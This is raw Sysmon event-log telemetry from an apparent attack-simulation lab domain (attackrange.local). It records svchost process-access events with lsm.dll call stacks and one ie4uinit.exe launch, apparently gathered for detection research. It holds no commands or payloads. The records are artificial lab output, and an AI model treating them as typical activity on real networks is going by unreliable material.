12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.924{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.924{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.909{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-64CA-6064-AC00-00000000AE01}42122512C:\Windows\System32\ie4uinit.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ie4uinit.exe+2d19|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.912{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 23542300x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.768{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905204815542592B7C6C51D0A146E6A4,SHA256=F6C41C980A06FBE07B2C1C20957B8D4BDBE0BDE54D0AF5F97FDBC76FC2F301DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 